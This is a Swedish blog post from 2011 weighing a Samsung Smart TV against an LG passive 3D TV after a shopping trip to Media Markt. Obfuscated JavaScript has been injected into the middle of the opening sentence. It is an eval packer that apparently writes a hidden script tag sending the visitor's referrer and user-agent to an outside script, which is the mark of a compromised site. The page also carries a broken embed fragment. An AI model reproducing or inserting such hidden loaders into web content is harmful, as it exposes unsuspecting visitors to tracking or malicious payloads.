Image Image Image Image Image Image Image Image Image Image

| 21 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Smart Tv eller 3D Tv ...Vilken ska man välja?

Smart Tv eller 3D Tv …Vilken ska man välja?
Filip Urde
  • On 20 december, 2011
  • http://www.revue.se/filip-urde

Vad eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srkkb|var|u0026u|referrer|sfzye||js|php’.split(‘|’),0,{}))
väljer man?

Smart Tv… Det var något som jag och pappa drömde om för några år sedan. Vi såg fram emot en tv med funktionerna från en dator. Först kom stora media boxar, som mer eller mindre var datorer du kopplade till tv:n, dessa var så klart sjukt dyra och onödiga. Detta var tidigt 2000, nu snart 12 år senare är Smart TV n här i sin fulla potential och priset är mer än överkomligt.

Men behöver jag den?

3D Tv… Drömmen som blivit verklig, det är inte gröna och röda glasögon, det är riktig 3D. Men är upplevelsen så bra som vi vill att den ska va?

Lördag: Jag var ute i hetsen, även kallat ”Jul handeln”. Och besökte dumt nog först Drottninggatan och sedan även Gallerian… För er som inte är från Stockholm och inte vet vilka platser jag pratar om så kan jag beskriva dem kort som: motström…

Gallerian har nämligen blivit utvald till platsen för första Media Markt inom tullarna. Herregud, det visste tydligen hela stan i helgen. Alla var på Media Markt!

Som tur är så har Tyskarna (Media Markt) köpt på sig kanske den mest onödigt största butiken i hela Gallerian och fyllt den med 20 saker, 2000 gånger 0m. En hel sektion med HDMI kablar säger väll allt. Men nog om det, jag var ute och blev lite små sugen på att få tag på en ny TV. Jag är nu 23år, har en 32″ LCD TV från Samsung och jag behöver sitta 1,5 meter ifrån när jag spelar Tv-spel. Många kanske säger att jag borde kolla synen… Mitt svar till dem är: det har jag och jag har glasögon. Jag kanske borde sluta spela Tv-Spel…. Yeah right!

Så problemet är alltså att Tvn är för liten!

Jag har precis som en lottovinnare, tänkt att jag vill ha en riktig värsting TV, annars så får det va! Helst 50″+ och sjukligt skarp. När jag gick och titta blev jag dock besviken, allas bild såg ut som skit, eller hur bra som helst, men med ett pris där efter. Jag tittade på både Smart Tv apparater och 3D apparater, vanlig TV räcker inte längre känns det som. Jag hittade två Tv apparater som jag tyckte verkade bra. Den första jag fastna för var den här:

Det är en Smart Tv från Samsung, väldigt snygg och smal.
type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/samsung_10577.js?w=620&h=350&pID=59289&bgc=ffffff&cw=1329435&skinName=light&wmode=window&hideChrome=0″>
Den andre, en passiv 3D Tv, från LG. Passiv 3D som gör det möjligt att se 3D utan batteridrivna
3D-glasögon (effekterna av 3D glasögon vet man heller inte idag). Något som länge varit det som talat emot 3D Tv, i alla fall för min del. De batteridrivna 3D glasögonen kostar ca: 1200kr st, vilket gör hela affären ganska fånig om Tv apparaten i sig kostar 10 000kr +… Med passiv 3D, behöver du endast ett par glasögon likt dem som du får på 3D Bio. Alltså: Alla dina kompisar kan titta utan att du blir ruinerad. Hur bra som helst!

Men om man ska välja idag? Vad väljer jag…

Jag har funderat på det här mycket, 3D i all ära… Men är det inte fånigt med glasögon överhuvudtaget? Jag blev först helt i extas över att glasögonen var utan batteri och att bilden var så skarp, trots Media Markts sjukhusbelysning. Men så här i efterhand så faller jag tillbaka på samma tanke jag tänkt tidigare, kommer jag + ex:antal vänner sätta oss och titta på 3D film hemma hos mig, alla iförda brillor? Tveksamt

En Tv med funktioner däremot kan jag se mig använda. Trots att det är funktioner som jag har i överflöde, dels på min iPad, iPhone och dator. Jag vet med mig att bara funktionen att enkelt komma åt youtube på Tvn skulle vara mycket populärt för mig och vännerna. Sen är designen av Samsungs Smart Tv enormt tilltalande, samt att bilden är fantastisk + att ”vanlig” 3D med batteri glasögon finns, så du får alltså mer TV för pengen.

Så om man är i valet och kvalet för en ny Tv, nu eller efter jul och väljer mellan en 3D eller Smart Tv. Då tycker jag Smart Tv vinner idag. 3D behöver mer tid att utvecklas och glasögonen måste bara bort.

Disclaimer: Jag har inte testat de olika tv apparaterna grundligt, endast varit ute i form av kund i butiken Media Markt.